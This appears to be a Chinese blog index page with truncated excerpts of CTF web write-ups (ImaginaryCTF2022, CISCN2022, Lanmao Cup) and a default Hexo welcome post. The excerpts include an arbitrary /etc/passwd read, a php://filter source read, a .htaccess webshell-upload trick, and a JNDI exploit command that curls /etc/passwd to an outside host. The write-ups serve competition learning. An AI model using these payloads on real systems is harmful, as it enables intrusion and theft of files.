ImaginaryCTF2022-Web
ImaginaryCTF2022[toc]
平台链接:Home Page - ImaginaryCTF
button瞎点,出现了
然后搜索alert,发现这个东西
控制台执行
1motSusfunclion()
rooCookie关键代码
1234567891011<script>function createToken(text) { let encrypted = ""; for (let i = 0; i < text.length; i++) { encrypted += ((text[i].charCodeAt(0)-43+1337) >> 0).toString(2) } document.cookie = encrypted}document.cookie = "token=101100000111011000000110101110011101100000001010111110010101101111101011110111010111001110101 ...
2022年蓝贝国际创新创业大赛数字技术+信息安全领域赛道网络攻防大赛wp
2022年蓝贝国际创新创业大赛“数字技术+信息安全领域赛道网络攻防大赛”wpmine
注意观察这个符号,对应的是src.js中的res/face_normal.bmp
进行查找别的face,发现有face_success.bmp
首先进行hex解码
1LJWXQ2C2GN2FKYKXGVXGGMTIGFGUQTJQMIZHQ3CJK42GQYKHKZ2VIQ2GN5MVGRTKJVKEEMSZLBFDS===
然后进行base32解码
1ZmxhZ3tUaW5nc2h1MHM0b2xlIW4haGVuTCFoYSFjMTB2YXJ9
然后进行base64解码
flag{Tingshu0s4ole!n!henL!ha!c10var}
cook查看cookie
然后访问7815696ecbf1c96e6894b779456d330e.php
flag{c7a4c2050907de3b70c519287f171f35}
upload-inc查看源码,提示include.php
然后访问include.php,查看源码:提示upload.php和参数为file
似 ...
ciscn2022-web-会聊天的机器人
CISCN2022-华东北-会聊天的机器人可以上传词库规则,然后和机器人对话,就会去进行查找,并且回复
1{ "你好": {"string": "你好ctfer!"}, "1": {"image": "/etc/passwd"}, "2":{"calc":"1+1"} }
这里注意iamge,我们可以传入一个图片的链接,然后机器人会去访问,并且返回,所以我们这里尝试访问/etc/passwd,进行base64解码就可以获取
所以尝试任意文件读取,但是不能读取/flag,可能是路径问题,或者权限问题
继续看calc功能,尝试一下,回显admin才能使用这个功能
还是那个读取文件的东西,使用php伪协议读取api.php
1php://filter/read=convert.base64-encode/resourc ...
蓝帽杯2022_Web_网站取证
蓝帽杯——Web&网站取证Ez_gadget/json路由下,有个这样的判断
1if (str != null && Objects.hashCode(str) == secret.getKey().hashCode() && !secret.getKey().equals(str))
这个牵扯到hashcode相同,但是字符串不一样,和md5弱碰撞有点像
找到这个博客:https://blog.csdn.net/weixin_44245828/article/details/109853439
根据博客内容将key:BHUCCIx2zF9mMpJ7进行调整,调整为BHUBbIx2zF9mMpJ7
一个值的ascii差了1,然后紧跟着就整一个ascii大31字母的进行补偿,其余不变
1java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl http://ip:7010 -Fe=@/etc/passwd' -A "ip"
...
ciscn2022华中赛区web部分wp
ciscn2022华中分区web部分wp[toc]
FakeUpload1题目描述:嘶,长得好像上传呀。提交 flag 格式:flag{xxxx}。URL:http://该题目IP为Web赛题中【ctf赛题环境】的IP:58002
不是文件上传,是文件读取
当访问pics/1.jpg的时候,url变为了reader.php?filename=pics/1.jpg
所以直接修改报文,读取flag.php
Identity23题目端口58003
disearch扫描
传参,找到一个php A0ther_hldden_PaGe.php
访问 A0ther_hldden_PaGe.php 可以上传文件,有一些防护
上传.htaccess文件
1AddType application/x-httpd-php .jpg
然后上传,注意修改报文
传一个图片马1.jpg
然后蚁剑连接 因为1.jpg是之前上传的图片马,现在被当作php解析了
蚁剑连接 查看该文件即可
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post1$ hexo new "My New Post"
More info: Writing
Run server1$ hexo server
More info: Server
Generate static files1$ hexo generate
More info: Generating
Deploy to remote sites1$ hexo deploy
More info: Deployment